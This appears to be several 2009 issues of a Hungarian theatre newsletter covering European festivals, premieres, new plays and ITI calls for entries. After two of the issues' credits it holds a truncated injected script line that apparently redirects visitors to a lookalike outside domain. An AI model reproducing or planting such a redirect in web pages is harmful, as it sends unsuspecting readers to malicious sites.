Tiz eves vagy, es a tanar vonalzoval kormost ad neked. Tiz eves vagy, es minden heten levelet kell irnod a bekerol. Tiz eves vagy, es szet tudsz szedni es ossze tudsz rakni egy Kalasnyikovot harom perc alatt. Az 1978-ban szuletett, moldvai Nicoleta Esinencu vadakkal teli, Antidot cimu darabja szerint tekintelyelvu tarsadalomban elunk, ahol semmi nem valtozott a fal leomlasa es a diktatura megszunese ota. Vad es duhtol izzo szenvedellyel idezi meg az auschwitz-i gazkamrak genocidiumat, Csernobil nuklearis katasztrofajat es a konyhai gazsutoben tortent ongyilkossagot, a lathatatlan mereg kozremukodeset, ami a lelki fertozottseg metaforaja lesz az eloadasban. Az Antidot premierje oktober 31-en volt a Staatsschauspiel Dresden-ben.

 

Az idegengyulolet uj fajtajat lathatjuk Dirk Laucke, az 1982-es szuletesu, keletnemet dramairo Fur alle reicht es nicht cimu darabjaban, amelyben o sem kimeli sajat orszagat, es a tarsadalom egyes szamkivetettjeire koncentral. Jo es Anna cigarettacsempeszessel keresi a kenyeret, Heiner pedig megjavit egy tankot a puszta kozepen kozel a cseh hatarhoz, es a haborus idokrol almodozik. A konfliktus akkor kezdodik, amikor megtalalnak egy illegalis azsiai menekulttel teli teherautot. A „fiji"-knek el kell tunniuk, jelenti ki Heiner neo-naci zsargonjaval elve. Ugyan Jo-ban reszvet ebred az azsiaiak irant, megis hagyjak, hogy a menekultek a teherautoban pusztuljanak.

 

A Goethe Intezet igazgatoja szerint az After the Fall projekt rendkivuli hatasu a kortars dramairodalomra es a kozonsegre egyarant, es tovabbi szinhazi networkepites soran remeli ennek eredmenyeit terjeszteni Europa orszagaiban.

 

 

 

1.3. A Young Vic 2010 tavaszi evadanak musora

 

A londoni Young Vic bejelentette 2010 tavaszi evadara vonatkozo musortervet. Januar 21-en mutatjak be Amir Nizar Zuabi I Am Yusuf And This Is My Brother cimu darabjat a szerzo sajat rendezeseben. Az 1948-ban Palesztinaban jatszodo eloadas a tortenelem, emlekezet es a szeretet kulonbozo formainak koltoi felfedezese, es a Shiber-Hur nevu palesztin tarsulattal koprodukcioban valosul meg. Arthur Schnitzler: Sweet Nothings cimu muvet Luc Bondy rendezte, es David Harrower uj valtozataban lathato majd marcius 4-tol: tanulsagos tortenet a szexualis vagyakozasrol, a hagyomany kegyetlensegerol, es arrol, hogy a szerelmesek milyen sebezhetok. Aprilis 24-en lesz a bemutatoja az Elegy For Young Lovers cimu operanak, amelynek zenejet Hans Werner Henze szerezte, librettojat W H Auden es Chester Kallman irta. Egy koltorol szol, aki mindenkit tonkretesz maga korul, hogy muveszetet es onerzetet taplalja. 

 

 

1.4. Uj kortars muvek bemutatoi Angliaban

 

Az angol szinhaz az idei szezonban is torekszik a honi kortars szerzok bemutatasara. Ezek sorat Howard Barker: Found and Ground cimu, koltoi ereju alkotasanak bemutatoja nyitja a Riverside Studioban. A National tuzi musorara David Hare: The Power of Yes c. muvet, amelynek kozeppontjaban a gazdasagi vilagvalsag all, illetve annak megerteset kiserli meg a szerzo.

A Royal Courtban lesz lathato Tim Crouch : The Author c. darabja, amely az illuzio, a fikcio es a realitas kevereke az eroszakrol, es arrol, hogy mit vagyunk hajlandoak eszrevenni peldaul egy, a szemunk elott zajlo konfliktusbol. Az eloadas kulonlegesseget az is adja, hogy a jatekban a kozonseg aktiv szerepet kap.

1.5. Kortars nemet drama symposium

Nothing Older than Yesterday's Premier cimmel kortars nemet drama symposiumot tartottak Berlinben 2009. oktobereben. A szinhazak minel tobb bemutatot igyekeznek tartani, ez jelzi a sikeres mukodesuket. Ezzel szemben nem akarnak mar bemutatott uj darabokat ismet szinpadra vinni - igy panaszkodnak a fiatal dramairok. A rendezok, dramaturgok es kritikusok szerint viszont ezekbol a friss, kortars dramakbol gyakran hianyzik a kello fajsulyossag. A berlini konferencian minden fel kepviseltethette magat a kerekasztal-beszelgetesen, amibol a mai nemet kortars drama helyzete elesen kirajzolodott.

1.6. World Stage Design 2009 dijazottja Csanadi Judit

Rangos nemzetkozi dijjal jutalmaztak Csanadi Juditot harom, a Gardonyi Geza Szinhazban bemutatott eloadashoz keszitett diszletterveert, amelyet tobb mint ezer mu kozul valasztott ki a nemzetkozi zsuri. A Peer Gynt, A nagyratoro es Az allhatatlan cimu eloadasokat Csizmadia Tibor rendezte.

 

2. Kortars drama

 

2.1. Colin es Mary Crowther: Just Passing

 

Szereplok:

 

Ferfi - 40 es 70 ev kozott. Derus, felfrissult.

No - 40 es 70 ev kozott. Szeszelyes, kimerult.

Apolono - 50 es 60 ev kozott. Elhasznalt, gondoskodo.

 

Szerelmi tortenet vagy kisertethistoria? Colin es Mary Crowther szerzoparos Just Passing cimu, meleg hangu es szellemes egyfelvonasosa egy ferfi es no talalkozasarol szol, ahogy a parkban bucsut vesznek egymastol egy padon. De melyikuk hagyja el a masikat, es miert?

Ugy tunik, hogy civakodasuk ellenere boldog hazassagban eltek mindaddig, amig egy autobaleset miatt a Ferfi szanatoriumba nem kerult. Most el kell koltoznie, hogy a No tovabblephessen.  A joindulatu, de unott apolono elkotyogott megjegyzese lesz az utolso csepp a poharban.  A bucsu hallgatolagos - a No taxiert rohan es elviharzik, a Ferfi ulve marad, amig el nem halvanyul az emlek.

 

Colin es Mary Crowther darabjat 2008. novembereben adta ki a Samuel French Ltd. A szerzoparos egyeb dramai: Till We Meet Again, Reflections, Lost Garden, Noah's Ark.

 

 

 

 

3. ITI  Figyelo: Felhivas, palyazat, informacio

 

3.1. Nemzetkozi dramapalyazat

A Nemzetkozi Szinhazi Intezet kereteben mukodo Dramairok Nemzetkozi Foruma palyazatot hirdet 2010-re. Ezen olyan temaju darabokkal lehet benevezni, amelyek a ma vilag legegetobb problemaival foglalkoznak, mint a szamuzetes, a migracio, az identitas. A dramakat angol, francia vagy arab nyelven lehet beadni. A mu nem haladhatja meg a szaz oldalt, es nem lehet monodrama. Nemzetkozi zsuri dont a dijak odaiteleserol. (Elso dij: 3000 US dollar, masodik dij: 2000 US dollar, harmadik dij: 1000 US dollar)

Beadasi hatarido: 2010. junius 30.

 

SuisseTHEATRE ITI

International Theatre Institute

Ursula Werdenberg

Directrice

Geschaftsfuhrerin

***

General Guisan-Strasse 174

CH - 4054 Basel

Switzerland

Tel.: + 41-61-301 85 15

Fax : + 41-61-301 85 16

This e-mail address is being protected from spambots. You need JavaScript enabled to view it

www.iti-swiss.ch

3.2. Uj szerzemenyek az OSZMI konyvtaraban

A Cseh Szinhazi Intezet altal kiadott, gazdagon illusztral konyv  Josef Svoboda eletmuvet mutatja be.

Megjelent a Visegrad Drama harmadik kotete, amelyben Orkeny Istvan: Totek cimu darabjanak uj angol forditasa olvashato, valamint Szirak Peter tanulmanya a szerzorol.

 
     

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI_ITI HÍRLEVÉL 2009 szeptember

ITI-OSZMI HIRLEVEL 2009/szeptember

 

1. Hirek

1.1. Plzen - 17. Nemzetkozi Szinhazi Fesztival

1.2. Merre tart Svajc kulturpolitikaja?

1.3. Uj rendezesben lathato Puccini: Toscaja a MET-ben

1.4. A Theatre du Soleil hirei

1.5. Tanulmany Nagy Jozsef Filozofusok c. eloadasarol

 

2. Kortars drama

2.1. Heather Dunmore: Blue

2.2. Francis Beckett: The Right Honourable Lady

 

3. Folyoirat szemle

3.1. Theatre/Public193. szam

3.2. A Parizsi Oszi Fesztival programja

 

4. ITI  (Nemzetkozi Szinhazi Intezet) hirek,felhivasok, palyazatok

4.1. Felhivas a 26. Nemzetkozi Szarajevo Fesztivalon valo reszvetelre

4.2. Nemzetkozi konferencia es workshop Ausztriaban

4.3. A 14. Nemzetkozi Okori Gorog Dramafesztival tarsulatok jelentkezeset varja

1. Hirek

 

1.1. Plzen - 17. Nemzetkozi Szinhazi Fesztival

 

2009-ben oktober 9. es 13. kozott rendeztek meg Plzenben Nemzetkozi Szinhazi Fesztivalt. A fesztival vezeto helyen szerepel a kozep- es kelet-europai hasonlo rendezvenyek soraban. Tavaly a Visegradi Orszagok Kulturalis Miniszteriuma nekik itelte meg a legjobb kulturalis projektnek jaro dijat. 2009-ben a kiemelkedo cseh es europai szinhaz legjavat felvonultato program mellett egy nemzetkozi konferencianak is otthont adott a rendezveny: Twenty Years After - Metamorphoses and Reflections of Theatre since 1989 (Husz evvel utana - Szinhazi atalakulasok es gondolatok az 1989 utani szinhazrol) a Nemzetkozi Szinikritikusok Szovetsegenek szervezeseben. A szeles valasztekot kinalo fesztivalmusorban szerepelt tobbek kozott Aiszkhulosz Oreszteiaja Krakkobol Jan Klata rendezeseben, Vaclav Havel: Leaving cimu darabja Martin Glaser szinpadi megfogalmazasaban Ceske Budejovicebol, a Europeans a pragai Boca Loca Lab eloadasaban, Jiri Adamek rendezeseben. Gothar Peter rendezese, az Ivanovek karacsonya es Visky Andras: A meg nem szuletett cimu darabja Tompa Gabor szinreviteleben szinten kepviseltette magat a programban, es szamos szinhazi szakember velemenye szerint ez volt a ket legjobb eloadas a fesztivalon. A fiatal cseh rendezo, Jan Mikulasek Hedda Gablere es Hamlete otletes, igeretes vallalas: stilusjegykent vonul vegig mindket eloadason a szerepkettozes, olykor tobbszorozes, es a rendkivuli ritmuserzek. Kulonleges elmeny volt megnezni a szinten cseh Viktorie Cermakova Polibila Dubceka (A no, aki megcsokolta Dubceket) cimu groteszk rendezeset a sorgyarban. A szerzo a politikai kommentator es dramairo Karel Steigerwald, aki ebben a darabjaban 1968. traumatikus esemenyeit dolgozza fel a majusi diaklazadastol Dubcek letartoztatasaig egy fiatal lany sorsan keresztul, aki a lazadaskor bortonbe kerul, mert megcsokolt egy amerikai kolto-diakot, majd egy gyarban megcsokolja az odalatogato Dubcek elvtarsat, vegul elszanja magat, hogy megcsokolja magat Brezsnyevet is. Maciej Sobocinski Othelloja steril, IKEA hangulatot idezo diszletben zajlott, ahol a hirtelen tulhevulo vagy felidegesedo, hatulgombolos feher inges es nyakkendos szereplok labon allo, vizzel teli hutocseszekbe merithettek fejuket szukseg eseten. Othello az elso felvonas elejetol maganyosan setalgatott karjaban a halott, tagjait rongybabakent logato Desdemonaval - ez az elegikus epizod ciklikusan visszatero motivum volt az egyebkent vegiggondolt, egyseges eloadasban. A fesztivalprogramot szinesitette egy libanoni vendegjatek, a Looking for a Missing Employee. A darabot sokat sejteto modon Rabih Mroue irta, rendezte es jatssza. A szinpadon masfel oran keresztul nincs igazi jatek: Rabih Mroue a kozonsegben foglal helyet, arcat es kezet kivetiton latjuk, ahogy vegiglapoz harom-negy fuzetet, es egyesevel, embert probaloan vontatottan meseli el a bennuk levo ujsagcikkek tartalmat. A kulonbozo libanoni ujsagokbol kivagott cikkek mind ugyanarrol az eltunt szemelyrol szolnak, aki a libanoni penzugyminiszterium dolgozoja volt, es egyszer csak nyoma veszett. Kozben az eloadas masik, kozonsegben ulo nema szereploje lerajzolja a szoba kerult gyanusitottak kozotti viszonyrendszert, es iskolas, akombakom grafikonon folyamatosan abrazolja a miniszteriumbol eltunt tetemes penzosszeg valtozasat. Kulonos, az „igazsagot szandekosan nem kereso" doku-dramanak lehettunk tanui, ahol vegul magyarazatot nem kaptunk a keresett szemely eltunesenek okara, de megtalaltuk ot magat egy erdoben savba martva. Az off-programbol kiemelnem Michael Ditte Terra Granus cimu darabjat a szlovak Iveta Jurcova rendezeseben. A fiatal alkotok a 2001 ota aktivan mukodo Poton Divadlo tagjai, akik ezuttal a kitelepites, az otthonkereses temakoret dolgoztak fel hat kulonbozo tortenetben. A szineszileg egyenetlen, de lenduletes es paradesan otletgazdag eloadas eros szinhazi nyelvet, emlekezetes kepeket hagyott maga utan. A tuzvedelmi eloirasokat betartva meggyurnak es megsutnek elottunk egy hetre valo kenyeret, egy fel nyulat ego tuzon, mikozben a terhes nok kototukkel a hasukban ulnek a fodrasznal, vagy becipelik a hazba utolso megmaradt szilvafajukat, hogy leszedjek rola meg a gyumolcsot, mielott elhagyjak az otthonukat. Az eloadas Pozsonyban a Nova Drama Fesztivalon kozonsegdijat kapott.  (R.A.)

 

1.2. Merre tart Svajc kulturpolitikaja?

 

Thomas Hirschhorn az egyik legtobbet kiallito svajci kepzomuvesz 1957-ben szuletett Bernben. Ma Parizsban el es alkot. Ismert es elismert muvesz, amit rengeteg nemzetkozi dij is igazol. 2004-ben Parizsban a Centre Culturel Suisse-ben „Swiss-Swiss Democracy" cimu kiallitasa botranyt es elenk polemiat inditott el hazajaban. A Pro Helvetia, a kulturat tamogato svajci alap 180 ezer svajci frankkal tamogatta a kiallitast, amely a muvesz szandekai szerint a demokracia fogalmanak muveszi dezidealizalasa volt, a svajci kozvetlen demokracia abszurd gyakorlatanak kritikaja. Nem csak a kiallitas plakatja volt provokacio, hanem az osszes, ez ido alatt megvalositott program is, mint peldaul Markus Steinwag filozofus eloadassorozata a demokracia, a felelosseg filozofiajarol, valamint a Gwenael Morin szinhazi tarsulatanak bemutatoja, amelyben Schiller Tell Vilmosat adaptaltak es megkerdojeleztek, kritizaltak a felszabaditast jelkepezo nemzeti hosuk alakjan keresztul a svajci demokracia mitoszat. Az eloadasban hasznalt elemek sem nelkuloztek a provokaciot, peldaul az egyik szinesz kutyat utanozva pisilte le egy akkori svajci politikus fenykepet.

A kiallitast es a hozza szorosan kapcsolodo rendezvenyeket sok szempontbol kritizaltak. A kepzomuvesz szemere vetetettek azt is, hogy politikai okbol elutasitja, hogy Svajcban allitson ki, ugyanakkor elfogadja az alapitvany kozpenzekbol szarmazo tamogatasat, kulfoldon kritizalja hazajat. A polemia 2005-ben felerosodott, es eppen akkor, amikor a koltsegvetesi vitat tartottak es a szovetsegi kormany javaslatara, mintegy „bunteteskent", egy millio svajci frankkal kurtitottak a Pro Helvetia budzsejet. A „Hirschhorn-ugy" neven elhiresult eset mind a mai napig referencia, igazodasi pont Svajcban, kulonosen napjainkban, amikor a muveszetekrol, azok tamogatasarol, a muveszetek es az allam viszonyarol szolo, 2012-ben eletbelepo torvenyt keszitik elo.

Ennek fenyeben tunik fontosnak a Pro Helvetia altal kiadott Passages c. folyoirat legutobbi szama, amelyben muveszeket es politikusokat kerdeztek meg arrol, hogyan definialjak a kultura es politika viszonyat. Ez parbajkent vagy kettoskent foghato fel; szerelmi hazassagkent vagy kenyszerhazassagkent; kolcsonos gazdagitaskent vagy eppen kolcsonos fuggeskent ertelmezheto.

Thomas Steinfeld, a Suddeutsche Zeitung ujsagiroja A muveszet szabadsaga - milyen aron? cimu cikkeben a muveszet szabadsagat, mint annak belso lenyeget tartja elsodlegesen fontosnak, szerinte az allam feladata az, hogy a muveszek es a tarsadalom kozotti kapcsolatban a muveszek vedelmet biztositsa.

Pius Knusel, a Pro Helvetia igazgatoja abbol indul ki, hogy az 1970-80-as evek lazadoinak koszonhetoen Svajcban a muveszet egyertelmuen a szolas szabadsaganak integrans es elismert resze, a muveszek szabadon kifejezhetik magukat, es nem kell felniuk a cenzuratol. Az allamnak szerinte az a feladata, eppen a Hirschhorn ugybol tanulva, hogy a politika tobbe ne avatkozhasson be se kozvetlenul, se kozvetve a muveszetekbe, es biztositsa peldaul a Pro Helvetia fuggetlenseget, anyagi es egyeb szempontbol. Az igazgato szemleletet meghatarozza, hogy szerinte a hangsulyt semmikeppen nem a produktivitasra, vagyis a mennyisegre, inkabb az elmelyult muveszi munka tamogatasara, annak segitesere kell helyezni.

 

 

 

 

 

1.3. A Theatre du Soleil hirei

 

A Theatre du Soleil nagy kihagyasokkal irja hirleveleit. A 2008. marciusit a most augusztus vegi koveti, amelyben arrol tudositanak, hogy iden unnepli fennallasanak 45. szuletesnapjat. Tobbek kozott ennek az evfordulonak is koszonheto, hogy iden eppen Ariane Mnouchkine kapta a Norvegia altal alapitott Nemzetkozi Ibsen-dijat. A hirlevelbol az is megtudhato, hogy elkeszult az Ephemeres cimu eloadas DVD-je, amelyet egyelore csak a Theatre du Soleil-tol

lehet megvasarolni.

A szinhaz a Bibliotheque Nationale de France (BNF)-nak adomanyozott jelentos szamu dokumentumot, valamint fotokat, hang- es video felveteleket, jelmezeket, sajto-kivagatokat. Ezek jo resze mar kutathato a konyvtar szinhazi gyujtemenyeben (rue de Richelieu, 58. Parizs).

Szeptember 3. es oktober 11. kozott a Festival Premiers Pas kereteben ujra lathato a Cartoucherie-ben a Theatre Aftaab, az afgan Theatre du Soleil, amely Kabulban dolgozik es Parizsban ujra jatsszak a Tartuffe es Helene Cixous Ce jour-la (Azon a napon) c. darabokat.

Uj eloadasra is keszul a tarsulat. Ennek munkacime L'Autre Route (A masik ut). Valojaban Verne Gyula egyik regenye inspiralja a darabot, amelynek szoveget reszben Helene Cixous irja, reszben a tarsulat kozosen hozza letre.  A bemutatora 2009. november 11-en kerul sor.

 

1.4. Uj rendezesben lathato Puccini: Toscaja a MET-ben

 

Bar 2006 ota igazgatja Peter Gleb a New Yorkban Metropolitan Operat, megis a most kezdodo szezon az elso, amelynek programjat o allitotta ossze. Az idei evad az ujdonsagok jegyeben telik: kilenc uj produkciot mutatnak be. De az is ujdonsagnak, sot mereszsegnek szamit, hogy a legrangosabb europai rendezoket hivja meg az operak szinrevitelere, tobbek kozott Patrice Chereau-t, Luc Bondy-t. Ez utobbi rendezeseben mutattak be Puccini: Toscajat szeptember 21-en. A premier kozonsege majdhogynem kifutyulte az eloadast, mert nem az 1985 ota megszokott, Zeffirelli megalmodta operat latta viszont. A kritikus szerint a MET kozonsege szamara az igazi Tosca eloadas olyan, amelyben - mint a mozivasznon - barokk templom, a Farnese palota es a Saint-Ange kastely diszlete lathato. Vagyis olyan eloadasra vagynak, amely megfelel a konvencioknak es fokent az altaluk elkepzelt olasz vilagba repiti oket. Luc Bondy rendezese es Richard Peduzzi diszlete epp az ellenkezoje mindennek. Itt a III. felvonasban a tobzodo latvanyt egy egyszeru torony es szurkeskek eg helyettesiti, ami az alkotok szerint jobban ervenyre juttatja a halalraitelt remenyvesztettseget. Kulonben is: a fenyek, szinek mindvegig a szereplok es a helyzetek valtozasait kovetik. Meltatlankodast valtott ki az is, hogy a II. felvonasban nehany art deco butor is feltunt, amellyel elegansan es diszkreten arra utaltak, hogy Scarpia, a rendorfonok es ama bizonyos Duce kozott mintha nemi hasonlosag lenne felfedezheto. Zefirelli, anelkul, hogy latta volna az eloadast, a New York Times internetes oldalan arrol az „idiota" szokasrol beszelt, ahogy a masod- es harmadrendu rendezok, mint peldaul Bondy, Puccini operajat ertelmezik, szinre viszik. Azonban a Le Monde kritikusa szerint az eloadas, a zenei megvalositas egy szinte tokeletes operaeloadast kinal a kozonsegnek.

Az eloadas oktober 7-ig lathato a New Yorkban, a Metropolitanben.

 

 

1.5. Tanulmany Nagy Jozsef Filozofusok c. eloadasarol

 

Az OSZMI Tancarchivumaban olvashato a Pleine Marge cimu irodalmi, kepzomuveszeti, kritikai folyoiratnak az a szama, amelyben Josef Nadj: Les philosophes cimu eloadasarol szolo tanulmany talalhato Myriam Bloede tollabol. A cikk gazdag illusztracios anyagat Josef Nadj grafikai es fotoi adjak.

 

 

 

2. Kortars drama

 

2.1. Heather Dunmore: Blue

Szereplok:

3 no/ 1 ferfi

 

A Blue cimu egyfelvonasos megindito darab csaladrol, maganyrol, depressziorol es remenyrol. Az orvos Leo diagnosztizalt depresszioban szenved, es nehezen fogadja el a helyzetet. Visszaemlekezik a gyerekkorara, majd arra az idoszakra, amikor apa lett, es ujra ateli az osszes gyanakvasat, panikrohamat, elokerulnek reg elfeledett erzesei, mikozben a hipnozistol a muveszet-terapiaig mindent megprobal, hogy megkuzdjon a betegsegevel. A kepet tovabb arnyalja Leo edesanyja, testvere es felesege, akik mindnyajan tudnak mit meselni a depressziorol, es arrol, hogy ez az allapot milyen hatassal van azokra, akiket szeretunk.

A szamos brit fesztivalon 2002-ben es 2003-ban is dijnyertes darabot a Samuel French Ltd adta ki 2008-ban. Heather Dunmore, a szerzo az Oxfordshire Touring Theatre Company alkalmazottja, es rendszeresen reszt vesz az Oxford Playhouse munkajaban. A Blue az elso jelentos iroi sikere, melyet bemutatott az Edinburgh Fringe Fesztivalon is 2002-ben.

 

 

2.2. Francis Beckett: The Right Honourable Lady

Szereplok:

3 no/ 2 ferfi

 

Flavia ujsagiro a BBC-nel, akit magahoz csabit egy bulvarlap, a Daily Trumpet. Azzal a feladattal bizza meg, hogy szedje le a keresztvizet regi baratnojerol, Nicola Macdonaldrol, aki jelenleg brit miniszter. Flavia felfedi, hogy Nicolanak viszonya van egy nala joval fiatalabb ferfival, Stephennel. Ezt kovetoen mocskos, alpari vezercikkek jelennek meg roluk, mindkettojuk hazassagat es karrierjet fenyegetve. Flavia azt remeli, hogy ezek utan lehetosege lesz a kormanyban folyo komolyabb korrupcios ugyekbe betekinteni, de Mirandanak, a Daily Trumpet szerkesztojenek, es Griffnek, a frakciovezetonek mas tervei vannak.

A darabot 2009. juliusaban adta ki a Samuel French Ltd. Francis Beckett ismert iro, dramairo, szerkeszto es ujsagiro. 2007-ben jelent meg Gordon Brown - Past, Present and Future es The Great City Academy Fraud cimu konyve. Egyik legutobbi, Money Makes You Happy cimu darabjat a Bridewell Theatre mutatta be nagy sikerrel.

 

3. Folyoirat szemle

 

3.1. Theatre/Public193. szam

Julie Sermon, az Universite Lyon II. tanara az utobbi evekben azt kutatta, hogy a kulonbozo uj torekvesek, formak, irasmod hogyan valtoztatta meg az utobbi evek babjatszasat. A lap szerkesztosege tehat nem veletlenul kerte fel ot, hogy a babmuveszetnek szentelt szamat megszerkessze. Harom nagy temacsoportba sorolhatoak a cikkek, tanulmanyok, esszek. Az elsoben a legjelentosebb francia tarsulatokat, azok mukodeset mutatja be egy-egy teman keresztul, mint amilyen a Pulcinella figurajanak, torteneteinek, valamint a guignol hagyomanyainak ujraeledese. Didier Plassard tanulmanyaban a marionett etikajat es esztetikajat vizsgalja a mai szinpadokon. Berenice Hamidi-Kim azt mutatja be, hogy mi a francia babszinhaz-politikai elkepzeles a 21. szazad elejen. Sylvie Martin-Lahmani a Trafoban is vendegszerepelt holland Hotel Modern tarsulat eloadasait ertelmezi es azt vizsgalja, hogyan abrazoljak produkcioikban a haborut. A masodik temakorbe tartozo irasok a mufajok kozotti „hataratlepesek" kerdeset vizsgaljak: hogyan befolyasolja a mai babeloadasokat az uj technikak alkalmazasa. Mas tanulmanyok pedig a test, a maszk es a bab uj esztetikai megjeleniteset vizsgaljak a kulonbozo, vizualisan eroteljes eloadasokban. A harmadikban az uj babszinhazi nyelv kialakulasat taglaljak az esszek illetve eloadas-kritikak.

 

 

3.2. A Parizsi Oszi Fesztival programja

2009. szeptember 15. es december 19. kozott tartjak Parizsi Oszi Fesztivalt, amelynek programjat egy folyoirat lapszamanak megfelelo kiadvanyban kozlik. Nehany kiemelkedo esemeny a gazdag kinalatbol:

Szeptember

Szeptember 15. es 18. kozott a Theatre de la Ville-ben lathato a Robert Wilson-rendezte Brecht-Weill: Koldusopera, a Berliner Ensemble produkcioja. A kortars dan dramairo, Kaj Munk: Ordet / Szo cimu darabjat Arthur Nauzyciel rendezte francia szineszekkel. A tobb francia szinhaz illetve fesztival egyuttmukodesevel letrejott eloadas, amely ket kulonbozo vallasu csalad konfrontaciojarol szol, szeptember 16. es oktober 10. kozott lesz a Theatre du Rond-Point musoran. A D'Ores et deja Tarsulat ket darabjat Sylvain Creuzevault rendezte. Az elsoben, Notre Terreur (A mi terrorunk) cimuben Robespierre bukasat, halalat, utolso napjat dolgozzak fel, es azt vizsgaljak, hogy a mai demokraciara hogyan hat, hat-e az akkori forradalmi legenda. A masik produkciojuk (Le Pere Tralalere) Lise es Leo eskuvojevel kezdodik. Eleinte minden rendben zajlik, ahogy egy klasszikus darabban, majd apro repedesek jelennek meg, s vegul minden robban. (szeptember 16. es oktober 9. kozott, La Colline - Theatre National).  Szeptember 23-tol  27-ig a Centre Pompidou egy kulonlegesseget mutat be. A kepzomuvesz, szobrasz William Kentridge rendezte a Georg Buchner Woyzeckje nyoman keszult eloadast a del-afrikai Handspring Puppet Company-val. Ebben az eloadasban Woyzeck egy emigrans munkas, aki a Johannesburg kozeleben talalhato Highveld banyavidek korul boklaszik. Az eloadas fantomszeru diszlete Kentridge animacios filmje, amelyben az ember, babarnyak es a babmozgatok a gesztusok erzeki balettjet alkotjak.

Csak nehany alkalommal lesz lathato a Theatre de la Ville-ben a Theatre Vidy-Lausanne produkcioja, Heiner Goebbels operaja, az I Went To The House But Did Not Enter, amely T.S. Eliot, Maurice Blanchot, Samuel Beckett, Franz Kafka szovegeire epul.

 

Oktober

SaburoTeshigawara Miroku cimu szoloja oktober 7. es 10. kozott a Theatre National de Chaillot-ban vendegszerepel. Rachid Ouramdane Des Temoins ordinaires cimu koreografiajat, amely a tortenelem es az egyen viszonyat fogalmazza meg a tanc nyelven, a Theatre de Gennevilliers mutatja be oktober 8. es 18. kozott. A multimedia technikai eszkozoket is felhasznalo Tsuyoshi Shirai japan koreografus eloadasanak foszereploje egy chaplini figura, aki a targyak, fenyek varazslatos vilagaban probalja megragadni a mindig tovatuno dolgokat (oktober 15-16, Maison de la Culture du Japon). Shakespeare: Julius  Caesar c. darabjat az American Repertory Theatre, Boston adja elo. Arthur Nauzyciel rendezese az 1960-as evekbe teszi a darab cselekmenyet, amikor az Egyesult Allamok Kennedyt unnepli, ugyanakkor a mai politikusok altal felhasznalt es mindent uralo „storytelling" technikat is beepiti az eloadasba (oktober 21-24, Maison des Arts Creteil).

 

 

4. ITI  (Nemzetkozi Szinhazi Intezet) hirek, felhivasok, palyazatok

 

4.1. Felhivas a 26. Nemzetkozi Szarajevo Fesztivalon valo reszvetelre

 

Nemzetkozi Szarajevo Fesztivalt ( „Sarajevo Winter 2010" ) 2010 feburar 7. es 28. kozott rendezik Bosznia-Hercegovina fovarosaban. A sokeves hagyomannyal rendelkezo, nagyszabasu kulturalis es muveszeti esemeny a W.A.T., World Art Tendency mottoja alatt jon letre: a vilag minden tajarol meghivott muveszek talalkozohelye, networkepitesi lehetosege ez a fesztival. A szervezok eloadomuveszek, szinhazi eloadasok, operak, babeloadasok, klasszikus es kortars tancdarabok jelentkezeset varjak. A bevalogatott eloadasok resztvevoinek szallasat es etkezeset fizetik.

Hatarido: 2009. szeptember 30.

Jelentkezesi lap, feltetelek az alabbi elerhetosegeken: www.sarajevskazima.ba, This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 

 

4.2. Nemzetkozi konferencia es workshop Ausztriaban

 

Eloadomuveszek, tanarok, diakok jelentkezeset varjak az ausztriai Leibnitz-ben 2009. oktober 28. es 31. kozott tartando, Performing Arts Training Today elnevezesu nemzetkozi konferenciara es gyakorlati workshopokra, orosz, szingapuri, japan, ausztriai, brit es amerikai szinhazi szakemberek reszvetelevel. A konferencia tematikaja erinti a japan no es suzuki technikakat, a szinesz fizikalitasanak problemajat Meyerhold es Sztanyiszlavszkij modszereiben, valamint az ir szineszkepzes helyzetet.

 

Tovabbi informacio es regisztracio: http://www.iugte.com/projects/PhysicalTheatre.php

 

 

4.3. A 14. Nemzetkozi Okori Gorog Dramafesztival tarsulatok jelentkezeset varja

 

A 2010 julius 1. es 31. kozott megrendezendo 14. Nemzetkozi Okori Gorog Dramafesztival olyan szinhazak, tarsulatok jelentkezeset varja, amelyek repertoarukban rendelkeznek magyar nyelven jatszott okori gorog tragediaval vagy komediaval, ami eredeti szoveggel, nem adaptacioban valosul meg.

Hatarido: 2009. december vege

Tovabbi informacio: This e-mail address is being protected from spambots. You need JavaScript enabled to view it , www.cyprus-theatre-iti.org

 

 

 

Kesztettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2009. június

OSZMI-ITI HIRLEVEL 2009/5.

 

1. Hirek

 

1.1 A finn Nemzeti Szinhaz programja - 2009. oszi evad

1.2. Kiosztottak a 2009-es Moliere-dijakat

1.3. Az uj lengyel drama

1.4. Marguerite Duras: Az angol szereto

1.5. Theatre Royal Stratford East - rendhagyo program 2012 elso evadara

1.6. Almeida Nyari Szinhazi Fesztival 2009

1.7. Duisburg - 32. Duisburgi Akcentusok Fesztivalja

1.8. A Theatre national de la Colline 2009/2010-es szezonja

1.9. Premieres Fesztival Strasbourgban

 

2. Kortars drama

 

2.1. A 2009-es Moliere-dijazottak darabjai

 

3. ITI Figyelo: Felhivas, palyazat, informacio

 

3.1. Baltic Circle Fesztival - felhivas

3.2. Marrakesh - Nemzetkozi Szinhazi Fesztival

3.3. Nemet tarsulat improvizacios tancosokat keres

3.4. Felhivas - SPIELART Fesztival Munchen

1. Hirek

 

1.1 A finn Nemzeti Szinhaz programja - 2009. oszi evad

 

A finn Nemzeti Szinhaz a 2009-es oszi evadot csaladi darabbal nyitja meg, Rudyard Kipling Dzsungel konyvenek modern adaptaciojaval Jukka Rantanen rendezeseben. Alexander Mork-Eidem uj verzioja a mese cselekmenyet 2069-be helyezi, egy fiktiv, jovobeli varosi dzsungelbe,  paparazzi keselyuk es hajlektalan farkasok lakohelyere.

